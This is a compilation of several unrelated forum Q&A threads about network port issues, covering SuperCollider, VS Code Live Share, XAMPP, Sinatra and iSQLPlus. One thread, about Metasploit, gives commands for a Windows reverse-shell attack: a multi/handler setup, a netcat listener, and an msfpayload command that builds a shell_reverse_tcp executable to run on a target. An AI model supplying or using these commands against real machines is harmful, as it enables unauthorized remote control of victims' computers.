How do I manually start up scsynth and sclang? - supercollider

I'm using SuperCollider, and I want to basically package up a music script that's been written. This is under the goal of wanting to call it from Unreal Engine 4, for what it's worth.
I know SuperCollider runs with a server/client mentality, with scsynth being the server and sclang being the client. I'm on a Mac machine, and I'm trying to start up sclang/scsynth manually. Here's what I expected.
$> scsynth -u 2000 # This is running in another Terminal tab...
$> sclang -u 2000 MyScript.scd # Shouldn't this hook it up?
# An interactive terminal starts here...Shouldn't my commands
# be going to the server I started up?
Any ideas?

A small misunderstanding about the port numbers. Both scsynth and sclang can listen on a UDP port. In your code example you have started scsynth listening on 2000, and then you start sclang listening on 2000. That's two processes listening on 2000, not one process sending and one process listening.
If you start scsynth on port 2000, then the way to talk to it is not with sclang -u 2000, but by setting the port from within your sclang script. If I assume you're using the default server, then you can check what NetAddr the language thinks it's talking to:
"Default server is at this IP and port: %".format(Server.default.addr).postln;
If you want to set it to port 2000:
Server.default.addr.port = 2000;


Is it possible in vscode liveshare to share port 443 (https)?

I'm trying to share the port 443 from my development machine (win10) to my laptop (os x) using the amazing Live Share feature of Visual Studio Code.
On the dev machine I can access the service (running behind an nginx reverse proxy), so server is running fine.
VS Code doc mention a 1:1 mapping for the port "unless it's already in use".
Checking with sudo lsof -P -i TCP -s TCP:LISTEN on the mac, I can confirm 443 is not in use.
But the port on the mac is mapped to a random port (50150 in this case) instead of 443.
I guess I'm lacking some rights to open a sub 1000 port on os x.
Does anyone know what I can do (I mean other then running vscode as root)
Short answer (for anyone who would find this later) : not possible!
Restricted ports are ... restricted.
And as I said in the question i don't want to run vscode as root.
But what I ok to run as root is a small utility to do port forwarding.
So I'm now using portforward (npm -> ) to do just that, and everything works fine.

Standalone multi/handler reverse_tcp

Sorry for my english.
Using metasploit I generated an exploit for windows 7 with windows/shell/reverse_tcp payload.
Then I waiting connection using msfconsole:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LPORT 4444
I am successfully connected to command line of windows.
However I need to expect connection without using metasploit. I found how to create standalone module, but it was only for an exploit.
I need standalone multi/handler reverse_tcp or simply the code which listens to a certain port and then gives access to command line.
I don't really know what your constraints/restrictions are.
My guess is that, you want to "receive shells" on a computer without metasploit installed on it.If that's the case, you could use msfd(metasploit daemon installed on a different computer) or simply netcat,socat,...
What do you think of this:
listening with netcat on nc -l -p 4444
Using a shell_reverse_tcp instead# msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 X /root/darkbird.exe
Execute darkbird.exe on the target

Port 80 to 8080

First time I installed the package xampp I had many problems (like everyone who tries to use this programs and tries to create a website!)
I had made some researches on the web to find the solution to make Apache work: I setted the usual port 80 to 8080.
Now everytime I want to access to control panel of xampp or access to the DBMS MySQL I have always to add to the url ":8080" after "localhost".
My first question is: is it possible not to write ":8080" after the "localhost", maybe changing some settings I don't know where or in what file? (ex: "localhost:8080/xampp/" => "localhost/xampp")
Another thing: what could be the problems if apache is listening on the port 8080 instead of the usual one? (I don't have many experience in this field...)
Thank you in advance!
The only way to not write :8080 in the address bar is to make it work with the default port, which is :80. If the server does not want to start on that port it's probably because another program is already using it.
netstat -a -n -o | findstr ":80 "
With this command you can see which program is using your 80 port.

Can't access sinatra server from other computers

I am running a sinatra server with shotgun that returns a hello world when request GET in the root (typical tutorial) and works perfectly in my computer. I could only access it from localhost:9393 and then i run it with -o and could access it as IP:9393 but still only from the computer where the server was running.
How can i access the server from other computers? already tried bind and environment production.
Thanks in advance.
A bit more information is needed, like the OS that you are running and if you have made sure that any local firewalls are not blocking your traffic. I see that you marked this with the "Shotgun" tag which tells me that you are running on a *nix system as Shotgun uses forks and windows doesn't support them.
Check your iptables and see if you got anything in there. :)
iptables -nvL -t nat --line-numbers
iptables -nvL --line-numbers

iSQLPlus not starting on Port 80

I am trying to change the port for iSQLPlus on my Oracle DB server, by making changes in the file http-web-site.xml.
When I change the port to 80, in this file, the iSqlPlus doesn't start. I can nether connect over a browser or telnet to it, even from the host machine itself. On the command line, however, it does not give any errors.
I have tried changing it to other ports that is 8080 and 5560, it is running fine with no problems there.
I am using Oracle 10.2.0_10.
If on Unix you need to be root to run a service with port under 1024
For a more complete answer see
